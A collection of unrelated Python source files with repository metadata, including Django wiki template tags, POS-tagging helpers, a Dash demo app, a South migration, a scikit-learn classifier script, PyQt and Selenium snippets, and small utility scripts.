http://code.google.com/p/django-wikiapp/
"""
# Python standard lib imports
#
from urllib import quote
# Django imports
#
from django import template
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core.exceptions import ObjectDoesNotExist
from django.template.defaultfilters import stringfilter
# 3rd party imports
#
import creoleparser
from aswiki.parser import parser as creole_parser
from aswiki.parser import TOPIC_LIST, typogrify
# Model imports
#
from aswiki.models import Topic
from django.contrib.auth.models import User, SiteProfileNotAvailable
# what field in the profile is used to indicate a specific user's wiki
# topic?
#
ASWIKI_USER_TOPIC = getattr(settings, "ASWIKI_USER_TOPIC", "wiki_topic")
###
### This is a template library
###
register = template.Library()
####################################################################
#
@register.inclusion_tag('aswiki/topic_hierarchy.html')
def topic_hierarchy(topic):
"""
This inclusion filter will generate HTML for use in our hierarchy
section such that the topic named `foo.bar.biz.bat` will generate
html that looks like: `foo >> bar >> biz >> bat` where each `foo`
will be a link to topic `foo`, `bar` will be a link to topic
`foo.bar`, `biz` will be a link to `foo.bar.biz` and finally `bat`
will be a link to `foo.bar.biz.bat`
Arguments:
- `topic`: The Topic to generate our hierarchy links for.
"""
# If we get a string as our argument, then we need to split it
# directly - ie: we were not given a topic object (probably
# because it does not exist yet.)
#
if isinstance(topic, basestring):
topic_names = topic.split('.')
else:
topic_names = topic.name.split('.')
building = []
tn = []
for topic_name in topic_names:
building.append(topic_name)
tn.append((topic_name, '.'.join(building)))
return { 'topic_names' : tn,
'topic' : topic }
###########################################################################
#
@register.filter(name='creole')
@stringfilter
def creole(text, topic = None):
"""
Renders the text rendered by our version of the creole markup parser.
Arguments:
- `text`: The markup text to be rendered
- `**kwargs`: Required but not used by this function.
"""
# We need to lock the TOPIC_LIST before we render using this dialect
# even though in this instance we do nothing with the topic list
# that this text refers to.
#
try:
TOPIC_LIST.clear_and_lock()
TOPIC_LIST.current_topic = topic
text = typogrify(creole_parser.render(text, environ = TOPIC_LIST))
finally:
TOPIC_LIST.current_topic = None
TOPIC_LIST.unlock()
return text
creole.is_safe = True
###########################################################################
#
# {% creole %} ... {% endcreole %}
#
class CreoleTextNode(template.Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
return creole(self.nodelist.render(context))
@register.tag("creole")
def crl_tag(parser, token):
"""
Render the Creole into html. Will pre-render template code first.
"""
nodelist = parser.parse(('endcreole',))
parser.delete_first_token()
return CreoleTextNode(nodelist)
##################################################################
##################################################################
#
class TopicInfoNode(template.Node):
"""
Renders some information about a Topic (subject to the user's permissions)
"""
def __init__(self, topic):
self.topic_var = template.Variable(topic)
def render(self, context):
"""
Basically we render a HTML snippet with the given topic. The
reason this is actually a templatetag is that the user may NOT
have read permission on a topic and what template we use to
render depends on whether they have that permission or not.
"""
try:
topic = self.topic_var.resolve(context)
tmpl = "aswiki/topic_info_frag.html"
if 'user' in context:
user = context['user']
if not topic.permitted(user):
tmpl = "aswiki/topic_info_restricted_frag.html"
t = template.loader.get_template(tmpl)
return t.render(template.Context({ 'topic': topic, 'user': user },
autoescape = context.autoescape))
except template.VariableDoesNotExist:
return ''
####################################################################
#
@register.tag("topic_info")
def do_topic_info(parser, token):
"""
Handles parsing a 'topic_info' template tag. We expect one
argument - a variable containing the topic.
Arguments:
- `parser`: The django template parser object
- `token`: The raw contents of our topic_info tag.
"""
try:
tag_name, topic = token.split_contents()
except ValueError:
raise "%r tag requires one argument" % token.contents.split()
return TopicInfoNode(topic)
##################################################################
##################################################################
#
class EmbedASWikiTopicNode(template.Node):
"""
Given a topic name, if the user has permission to see that topic,
returns the rendered content of the topic.
If no topic exists by that name, it returns a link to that topic
so that it can be created.
"""
##################################################################
#
def __init__(self, topic):
"""
We expect the topic name.. if it is in single or double quotes
we treat it as the exact name of the topic. Otherwise we treat
it as a template variable to lookup.
"""
self.topic = topic
return
##################################################################
#
def render(self, context):
"""
Return an embedded wiki topic. We will return one of three
things. '' if the user does not have permission to see this
topic. A link to the topic if it does not exist, or the
formatted contents of the topic, with a link to the
topic.
Arguments:
- `context`: The django context object.
"""
try:
if self.topic[0] == self.topic[-1] and self.topic[0] in ('"', "'"):
# If the topic is surrounded as quotes treat it as the name
# of the topic.
#
topic_name = self.topic[1:-1]
else:
# Otherwise, treat it as a variable name that has the name
# of the topic in it.
#
topic_name = template.Variable(self.topic).resolve(context)
try:
topic = Topic.objects.get(lc_name = topic_name.lower())
except Topic.DoesNotExist:
# If the topic does not exist, then return a link to the
# topic.
#
if topic_name is None or len(topic_name.strip()) == 0:
return ""
return u'<a href="%s">%s</a>' % (reverse('aswiki_topic',
args=(topic_name,)),
topic_name)
# See if the user has pemission to view this topic. If they
# do not return an empty string.
#
user = None
if 'user' in context:
user = context['user']
if not topic.permitted(user):
return ''
elif topic.restricted:
return ''
# Otherwise they are permitted and the topic exists. Return
# a link to the topic and the topic's rendered content.
#
t = template.loader.get_template('aswiki/embedded_topic_frag.html')
return t.render(template.Context({ 'topic': topic, 'user': user },
autoescape = context.autoescape))
except template.VariableDoesNotExist:
return ''
####################################################################
#
@register.tag("embed_aswiki_topic")
def do_embed_aswiki_topic(parser, token):
"""
Handles the 'embed_aswiki_topic' template tag. We expect one
argument -- the name of the topic to embed. It can be a 'string'
or a variable. If it is surrounded by single or double quotes it
will be treated as a string, otherwise it will be treated as a
template variable.
Arguments:
- `parser`: The django template parser object
- `token`: The raw contents of our topic_info tag.
"""
try:
tag_name, topic = token.split_contents()
except ValueError:
raise "%r tag requires one argument" % token.contents.split()
return EmbedASWikiTopicNode(topic)
####################################################################
#
@register.simple_tag
def user_wikipage(user):
"""
A simple template tag that will render a link to the user's wiki
page if the user has a profile and the profile has an attribute
that is the value of 'settings.ASWIKI_USER_TOPIC'
NOTE: ASWIKI_USER_TOPIC defaults to 'wiki_topic'
The purpose is that whereever we would display a username, if the
user has a wiki topic associated with them by their profile, we
display the link to their wiki topic. This way anywhere on your
site that you refer to users, you can also refer to that user's
wiki topic if they have one.
If the user has no wiki topic associated with them via their
profile we return ''
Arguments:
- `user`: The user object. If this is not a django.contrib.auth.models.User
object we return ''.
"""
if not isinstance(user, User):
return ""
try:
profile = user.get_profile()
except (SiteProfileNotAvailable, ObjectDoesNotExist):
return ""
if profile is None:
return ""
if not hasattr(profile, ASWIKI_USER_TOPIC):
return ""
try:
topic_name = getattr(profile, ASWIKI_USER_TOPIC, None)
if topic_name is None or topic_name.strip() == "":
return ""
topic = Topic.objects.get(lc_name = topic_name.lower())
return '<a href="%s">%s</a>' % (topic.get_absolute_url(),topic_name)
except Topic.DoesNotExist:
return '<a href="%s" class="%s">%s</a>' % \
(reverse('aswiki_topic', args = (topic_name,)),
Topic.objects.css_class_name(topic_name), topic_name)
####################################################################
#
@register.simple_tag
def username_or_wikipage(user):
"""
This is like 'user_wiki_page' except that if the user does not have a wiki
topic set (whether it exists or not is not the same as not having one set)
we will return a string of 'username (full name)'. If their full name is
the empty string we will omit the '(full name)' part.
Arguments:
- `user`: The user object. If this is not a django.contrib.auth.models.User
object we return ''.
"""
if not isinstance(user, User):
return ""
topic_url = user_wikipage(user)
if topic_url != "":
return topic_url
full_name = user.get_full_name().strip()
if full_name != "":
return "%s (%s)" % (user.username, full_name)
return user.username
|
[
"scanner@apricot.com"
] |
scanner@apricot.com
|
dc83c5b64a4aace3f13366cfdd4e82eb64046ca8
|
c2c51cbeaaf62aa824c7546eeea5fc8f82564cc0
|
/helper_funcs.py
|
005332518a209b2ef7b08b484b75d0d99cf6dc05
|
[] |
no_license
|
matanby/pos_tagging
|
4ac91aa32a5fc720a8c685de745006064a46a4fa
|
91d8968ecade1219e86bf3a94bb18decfa1d5645
|
refs/heads/master
| 2021-04-30T17:32:26.562428
| 2017-01-27T13:59:46
| 2017-01-27T14:03:38
| 80,211,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,421
|
py
|
from __future__ import division
import sys
from numpy import random
import numpy as np
import parse
def loss(x, x_hat):
"""
Calculates and returns the loss of two given POS tags.
:param x: The correct POS tag.
:param x_hat: The inferred POS tag.
"""
T = len(x)
return sum([1 for i in xrange(T) if x[i] != x_hat[i]]) / T
def avg_loss(X, X_hat):
"""
Calculates and returns the average loss two given POS tag sets.
:param X: The correct POS tags set.
:param X_hat: The inferred POS tags set.
"""
return np.mean([loss(x, x_hat) for x, x_hat in zip(X, X_hat)])
def dot(v1, v2):
"""
Calculates and returns the dot product of a sparse vector
containing only 0/1 values, and a full vector.
:param v1: The sparse vector (contains indexes of '1's)
:param v2: The full vector.
"""
return sum(v2[i] for i in v1)
def frange(x, y, jump):
"""
Generator for range of floating numbers.
:param x: The start value of the generator.
:param y: The end value of the generator.
:param jump: The increment size of each generated value.
"""
while x < y:
yield x
x += jump
def get_data(k=5, n=1, shuffle=True, max_sentences=sys.maxint):
"""
Reads and returns the input data along with the
sets of unique words and POS tags.
:param shuffle: Should the data be shuffled?
:param k: cross-validation factor, if set to e.g. 4, size of test set is 1/4 of data
:param n: number of train/test sets to draw
:param max_sentences: maximal number of sentences to read from file
:return:
x_train - Train set of POS tags.
x_test - Test set of POS tags.
y_train - Train set of sentences.
y_test - Test set of sentences.
suppx - a set of the values of X (parts of speech)
suppy - a set of the values of Y (words)
"""
data, xvals, yvals = parse.collect_sets("data_split.gz", k=k, n=n, max_sentences=max_sentences)
if shuffle:
random.shuffle(data['train'])
random.shuffle(data['test'])
train_data = data['train']
x_train = [s[0] for s in train_data]
y_train = [s[1] for s in train_data]
test_data = data['test']
x_test = [s[0] for s in test_data]
y_test = [s[1] for s in test_data]
suppx = sorted(list(xvals))
suppy = sorted(list(yvals))
return x_train, x_test, y_train, y_test, suppx, suppy
|
[
"matan.ben.yosef@gmail.com"
] |
matan.ben.yosef@gmail.com
|
904c76d472af5ae3a14afc8b030afaab5968691c
|
85669e8035063261890b7c0532b11e4ac9e1c597
|
/docs/demos/06-integration-and-migration/switch_templates.py
|
fc348ae137cc46832f671f75d5aba4ff6753136b
|
[
"MIT"
] |
permissive
|
RenaudLN/dash-labs
|
6c0539f290d398ba66f3f559ff852c36e9c301e1
|
f12244a6b923ee97e7409fb59ae6dffde19056ab
|
refs/heads/main
| 2023-06-01T01:13:41.230423
| 2021-06-10T13:23:12
| 2021-06-10T13:23:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,657
|
py
|
import dash
import dash_labs as dl
import dash_bootstrap_components as dbc
import plotly.express as px
import plotly.graph_objects as go
# Make app and template
app = dash.Dash(__name__, plugins=[dl.plugins.FlexibleCallbacks()])
tpl = dl.templates.DbcRow(app, title="Gapminder", left_cols=4, figure_template=True)
# Load and preprocess dataset
df = px.data.gapminder()
years = sorted(df.year.drop_duplicates())
continents = list(df.continent.drop_duplicates())
@app.callback(
args=dict(
year=tpl.new_slider(years[0], years[-1], step=5, value=years[-1], label="Year"),
continent=tpl.new_checklist(continents, value=continents, label="Continents"),
logs=tpl.new_checklist(
["log(x)"],
value="log(x)",
label="Axis Scale",
),
),
output=tpl.new_graph(),
template=tpl,
)
def callback(year, continent, logs):
# Let parameterize infer output component
year_df = df[df.year == year]
if continent:
year_df = year_df[year_df.continent.isin(continent)]
if not len(year_df):
return go.Figure()
title = f"Life Expectancy ({year})"
return (
px.scatter(
year_df,
x="gdpPercap",
y="lifeExp",
size="pop",
color="continent",
hover_name="country",
log_x="log(x)" in logs,
size_max=60,
title=title,
)
.update_layout(margin=dict(l=0, r=0, b=0))
.update_traces(marker_opacity=0.8)
)
app.layout = dbc.Container(fluid=True, children=tpl.children)
if __name__ == "__main__":
app.run_server(debug=True)
|
[
"noreply@github.com"
] |
RenaudLN.noreply@github.com
|
1314464d44b5b1a8e5aa8e3eb5a27559609a8831
|
33a50bb13812090a36257078522b798762978c66
|
/vir2real/migrations/0002_auto__add_field_virtual2realadapterfieldmap_order_id.py
|
c07c048a8d7bbc2b02c87a642e47441da6d5684a
|
[] |
no_license
|
aa3632840/quanlin
|
52ac862073608cd5b977769c14a7f6dcfb556678
|
2890d35fa87367d77e295009f2d911d4b9b56761
|
refs/heads/master
| 2021-01-10T22:05:14.076949
| 2014-10-25T02:28:15
| 2014-10-25T02:28:15
| 23,178,087
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,311
|
py
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Virtual2RealAdapterFieldMap.order_id'
db.add_column(u'vir2real_virtual2realadapterfieldmap', 'order_id',
self.gf('django.db.models.fields.IntegerField')(default=0, max_length=5),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Virtual2RealAdapterFieldMap.order_id'
db.delete_column(u'vir2real_virtual2realadapterfieldmap', 'order_id')
models = {
u'vir2real.person': {
'Meta': {'object_name': 'Person'},
'alipay_num': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'phone_num': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'qq_num': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
},
u'vir2real.virtual2realadapterclassmap': {
'Meta': {'object_name': 'Virtual2RealAdapterClassMap'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'real_class_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'virtual_class': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.VirtualClass']"})
},
u'vir2real.virtual2realadapterfieldmap': {
'Meta': {'object_name': 'Virtual2RealAdapterFieldMap'},
'class_map': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.Virtual2RealAdapterClassMap']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order_id': ('django.db.models.fields.IntegerField', [], {'max_length': '5'}),
'real_field_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'virtual_field': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.VirtualFeild']"})
},
u'vir2real.virtualclass': {
'Meta': {'object_name': 'VirtualClass'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'vir2real.virtualdata': {
'Meta': {'object_name': 'VirtualData'},
'can_be_restore_real': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'erro_msg': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source_line': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'virtual_real_map': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.Virtual2RealAdapterClassMap']"})
},
u'vir2real.virtualfeild': {
'Meta': {'object_name': 'VirtualFeild'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'pclass': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['vir2real.VirtualClass']"}),
'type': ('django.db.models.fields.CharField', [], {'default': "'TYPE_CHAR'", 'max_length': '50'})
}
}
complete_apps = ['vir2real']
|
[
"262708239@qq.com"
] |
262708239@qq.com
|
0bed7c8b75cdf2078b82da54a9c4976787247f0f
|
4a7ad2535f7e05437eca3e15c89e1e1cc224395c
|
/Product/models.py
|
c97847721c2ef096dd14b31536b894be5055bb84
|
[] |
no_license
|
Twinkle126/InventoryManagement
|
e645c016141208f0ca6ae4ba3938f27ce91526b5
|
455fbbfee1a88c469f87c189acb34ad8cd558db7
|
refs/heads/master
| 2023-06-28T08:10:23.837678
| 2021-07-26T02:42:45
| 2021-07-26T02:42:45
| 389,485,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
from Invoice.models import Invoice
from django.db import models
# from Merchant.models import Buyer, Seller
# Create your models here.
class Item(models.Model):
product_name = models.CharField(max_length=50)
quantity = models.IntegerField(blank=True, null=True)
invoice = models.ForeignKey(Invoice, on_delete=models.CASCADE)
base_price = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
tax = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
created_at = models.DateTimeField(auto_now_add=True, blank=True)
modified_at = models.DateTimeField(auto_now_add=True, blank=True)
@property
def amount(
self,
):
"""
returns the total amount.
"""
if self.base_price:
return self.base_price + self.tax
else:
return 0
def __str__(self):
return self.product_name
|
[
"twinkle.yadav@renewbuy.com"
] |
twinkle.yadav@renewbuy.com
|
0c8c5da548afa55ab87e53d6f3e1bd743385ded6
|
a34f451c6d4ab2240965a8bc02ddd7f1ed232cb4
|
/Classifier/Classifier.py
|
67deca4278c97c0f84ea7f57f39089f4f9857da7
|
[] |
no_license
|
zoox101/Tonk
|
397169ce54bad4efa61808d2fb4af07468d1ec5c
|
562a9ad316d992d6f23598ba83f7e6b7b1de943b
|
refs/heads/master
| 2021-09-25T03:57:47.574196
| 2018-10-17T19:16:29
| 2018-10-17T19:16:29
| 113,006,312
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,526
|
py
|
#------------------------------------------------------------------------------#
# Imports
#------------------------------------------------------------------------------#
import pandas as pd
import pickle
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import accuracy_score
#------------------------------------------------------------------------------#
# Training Classifier
#------------------------------------------------------------------------------#
df = pd.read_csv('simulate.csv')
xs = df[['asum', 'acount', 'bcount', 'turn']]
ys = df['win']
SPLIT = int(0.7 * len(xs))
xs_train, xs_test = xs[:SPLIT], xs[SPLIT:]
ys_train, ys_test = ys[:SPLIT], ys[SPLIT:]
#Creating random forest
lr = LogisticRegression(random_state=0); lr.fit(xs_train, ys_train);
rf = RandomForestClassifier(random_state=0); rf.fit(xs_train, ys_train);
gbm = GradientBoostingClassifier(random_state=0); gbm.fit(xs_train, ys_train);
#Getting model scores
accuracy_score(ys_test, lr.predict(xs_test))
accuracy_score(ys_test, rf.predict(xs_test))
accuracy_score(ys_test, gbm.predict(xs_test))
#Saving output
pickle.dump(gbm, open('TonkPredictor.p', 'wb'))
x = pd.DataFrame([10,3,5,1], index=xs.columns).transpose()
gbm.predict_proba(x)
#------------------------------------------------------------------------------#
#
#------------------------------------------------------------------------------#
|
[
"william@thebookers.net"
] |
william@thebookers.net
|
01330cf4614af2857ae6b6437eb545355cc98770
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/greengrass_read/logger-definition_list.py
|
e93a22128bd3c013cfc4137367d69663cfd6d93f
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379
| 2020-12-27T13:38:45
| 2020-12-27T13:38:45
| 318,686,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,397
|
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import read_no_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/list-logger-definitions.html
if __name__ == '__main__':
"""
create-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/create-logger-definition.html
delete-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/delete-logger-definition.html
get-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/get-logger-definition.html
update-logger-definition : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/greengrass/update-logger-definition.html
"""
add_option_dict = {}
#######################################################################
# setting option use
# ex: add_option_dict["setting_matching_parameter"] = "--owners"
# ex: add_option_dict["setting_key"] = "owner_id"
#######################################################################
# single parameter
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
read_no_parameter("greengrass", "list-logger-definitions", add_option_dict)
|
[
"hcseo77@gmail.com"
] |
hcseo77@gmail.com
|
e32ea49205f86c9566ed076ee12b55d8d3be92f7
|
63fb62328d90bd5ab25e31f81e0dc99033f65413
|
/custom_transformer.py
|
8041cc6948ee9620f564c889ae83a1df17eac634
|
[] |
no_license
|
johanlaursen/mlflow_ork
|
130053c5d8c0515739ef3ea0d9a950ea77ad9923
|
db75848942aa658e9c6e4c828ce74a84f7b1a149
|
refs/heads/main
| 2023-04-09T01:08:00.320469
| 2021-04-21T14:24:22
| 2021-04-21T14:24:22
| 360,196,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
import numpy as np
class Transform():
def __init__(self):
pass
def fit(self,X,Y=None):
return self
def transform(self,df):
df = df.copy()
deg_enc= {'NNE':22.5,
'NE':45,
'E':90,
'ESE':112.5,
'SE':135,
'SSE':157.5,
'SW':225,
'SSW':202.5,
'S':180,
'WSW':247.5,
'W':270,
'WNW':292.5,
'NW':315,
'NNW':337.5,
'N':0,
'ENE':67.5}
speed = df.pop("Speed")
df["Direction"] = df["Direction"].map(deg_enc)
dir_rad = np.radians(df.pop("Direction"))
df["Wx"] = speed*np.cos(dir_rad)
df["Wy"] = speed*np.sin(dir_rad)
X = df[["Wx","Wy"]]
return X
|
[
"jocl@myVM.yqjrw1uhtbwehkpgrqlx5ujdif.fx.internal.cloudapp.net"
] |
jocl@myVM.yqjrw1uhtbwehkpgrqlx5ujdif.fx.internal.cloudapp.net
|
4092aebe47a3d3608dc5e285639c60170872d782
|
7986e3195b1afa43fde8880d07d14524456ddab7
|
/Test/BlendTest/SConstruct
|
5689caa1041cdf31df424a0dc140bcb73f6f97c6
|
[
"MIT"
] |
permissive
|
bugsbycarlin/Honey
|
813250e118805aaf9b55495714a3ae5edd7fafb6
|
56902979eb746c8dff5c8bcfc531fbf855c0bae5
|
refs/heads/master
| 2020-03-21T17:26:32.796500
| 2019-11-21T02:03:24
| 2019-11-21T02:03:24
| 138,832,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
import os
honey_version = "0_25"
env=Environment()
env.Append(CXXFLAGS = "-std=c++11")
libraries = ["libHoney.a", "boost_filesystem-mt", "boost_system-mt"]
env.AppendUnique(FRAMEWORKS = Split("OpenGL SDL2 SDL2_image SDL2_mixer SDL2_ttf"))
BlendTest = env.Program(target = "BlendTest",
source = Glob("./Source/*.cpp"),
LIBS = libraries,
LIBPATH="../../Engine/Build/%s/Library" % honey_version,
CPPPATH="../../Engine/Build/%s/Includes" % honey_version)
Default()
def cleanObjects(target, source, env):
os.system("rm ./Source/*.o")
cleanup = Command("cleanObjects", [], cleanObjects)
Depends(cleanup, BUILD_TARGETS)
#BUILD_TARGETS.append("cleanObjects")
|
[
"bugsby.carlin@gmail.com"
] |
bugsby.carlin@gmail.com
|
|
15d6163f4f154df42fae7bf78b86ed0595f21ac7
|
cead5aa67c0c45038917f306fefe31b53b5b639f
|
/temp/PyQt/comunication_objects/t1.py
|
71358a39239cb2f2df9bf8c574960572d4d688bd
|
[] |
no_license
|
songaal/AutoLogin
|
0a79400a88f1823aebfb819c98b489aeb267a679
|
778f30dd92dc4dba3d0a632511113bfe145d1b94
|
refs/heads/master
| 2022-02-27T23:13:54.152894
| 2019-09-22T16:27:41
| 2019-09-22T16:27:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,795
|
py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from selenium import webdriver
import time
import threading
from bs4 import BeautifulSoup as soup
import requests
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(388, 179)
self.lineEdit_2 = QtWidgets.QLineEdit(Dialog)
self.lineEdit_2.setGeometry(QtCore.QRect(100, 100, 271, 21))
font = QtGui.QFont()
font.setFamily("Yu Gothic")
self.lineEdit_2.setFont(font)
self.lineEdit_2.setStyleSheet("background-color: transparent;\n"
"color: rgb(255, 255, 255);")
self.lineEdit_2.setObjectName("lineEdit_2")
class Dialog(QtWidgets.QDialog, Ui_Dialog):
def __init__(self, parent=None):
QtWidgets.QDialog.__init__(self, parent)
self.setupUi(self)
# self.pushButton.pressed.connect(self.textEdit.clear)
# self.pushButton.pressed.connect(self.sejd)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
self.keyworddict = {}
self.count = {}
MainWindow.setObjectName("MainWindow")
MainWindow.resize(803, 538)
MainWindow.setMinimumSize(QtCore.QSize(0, 0))
MainWindow.setMaximumSize(QtCore.QSize(10000, 10000))
self.centralWidget = QtWidgets.QWidget(MainWindow)
self.centralWidget.setObjectName("centralWidget")
self.pushButton = QtWidgets.QPushButton(self.centralWidget)
self.pushButton.setGeometry(QtCore.QRect(180, 210, 75, 23))
font = QtGui.QFont()
font.setFamily("Yu Gothic")
font.setBold(True)
font.setWeight(75)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
MainWindow.setCentralWidget(self.centralWidget)
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
QtWidgets.QMainWindow.__init__(self, parent)
self.setupUi(self)
self.pushButton.pressed.connect(self.on_Button_clicked)
def on_Button_clicked(self):
dialog = QtWidgets.QDialog()
dialog.ui = Ui_Dialog()
dialog.ui.setupUi(dialog)
# connect signal to slot
dialog.ui.lineEdit_2.textChanged.connect(self.dialogTextChanged)
dialog.setWindowTitle("Login")
# dialog.setAttribute(QtCore.Qt.WA_DeleteOnClose)
dialog.exec_()
if dialog.exec_() == QtWidgets.QDialog.Accepted:
text = dialog.ui.lineEdit_2.text()
# print(dialog.ui.lineEdit_2.text())
dialog.deleteLater()
def dialogTextChanged(self, text):
print(text)
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
w = MainWindow()
w.setWindowTitle("ui")
w.show()
sys.exit(app.exec_())
|
[
"taxkmj@naver.com"
] |
taxkmj@naver.com
|
b019e080a9babb4832dee148b2d43232ad3da0b4
|
7682f822e5d19ee2ecd502e41bc49f550cbf6e8f
|
/SeleniumBasics/loginException/google.py
|
5590dcfd2f3f883915145d2aa94e7528cdff2eab
|
[] |
no_license
|
Swtbgvi/SeleniumBasics
|
325ff9a78c8d92fb8c389cc7a6a6df108e33e898
|
db7714b9053d97ffa79fe2f00342d9cc84667fea
|
refs/heads/master
| 2020-05-03T16:09:00.571126
| 2019-05-11T11:46:07
| 2019-05-11T11:46:07
| 177,285,887
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 492
|
py
|
from selenium import webdriver
# driver = webdriver.(executable_path="C:\\Users\\ss035878\\Downloads\\geckodriver-v0.24.0-win64")
# driver.get("https://www.google.com/")
# driver = webdriver.Firefox(executable_path="C:\\Users\\ss035878\\Downloads\\geckodriver-v0.24.0-win64\\\\\\geckodriver.exe")
# driver.get("https://www.google.com/")
driver = webdriver.Ie(executable_path="C:\\Users\\ss035878\\Downloads\\IEDriverServer_x64_3.14.0\\IEDriverServer.exe")
driver.get("https://google.com")
|
[
"Swetha.S@Cerner.com"
] |
Swetha.S@Cerner.com
|
62497a6c4d51625ede2c029c09648ecc58cd77fc
|
dea3132777935c321973e2ec0af47aa3cbf1f191
|
/09 Bayesian Networks/venv/Scripts/pip3.8-script.py
|
0e3dcc7d40f6d6347acbff9ae3f9632fc37502cb
|
[] |
no_license
|
SBangslund/SE04_AI
|
c14a11b1db0bbf8fd642b289d6ecdd6256dbb48f
|
7a2f5ac41e7b25b4b10a4033d2c940a79d1fd0ff
|
refs/heads/master
| 2022-05-09T06:10:07.110424
| 2020-04-30T14:39:12
| 2020-04-30T14:39:12
| 247,294,833
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
#!"D:\SB\OneDrive\SDU\Software Engineering\03 Courses\4. AI (Artificial Intelligence)\Exercise_07\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
|
[
"s.bangslund@hotmail.dk"
] |
s.bangslund@hotmail.dk
|
f884e19aeddc03800852b567b370b7657aacfbd2
|
92322d778ce7de12f8729b1838e5e5fc9b6d69d0
|
/kbc_3.py
|
e3914b6f69b5eab7751aed80cb0b9ded8ba4d8a4
|
[] |
no_license
|
kabitakumari20/List_Questions
|
426e2816db37583309e499d42f8706de404bb4e7
|
849b23bd73f470f5ee23a03bfb4f09b772b224cf
|
refs/heads/main
| 2023-04-04T10:07:39.950157
| 2021-04-15T15:47:02
| 2021-04-15T15:47:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
questions_list=[["1.how many continenets are there?"],["2.what is capital of india?"],["ng m kon sa course hota h?"]]
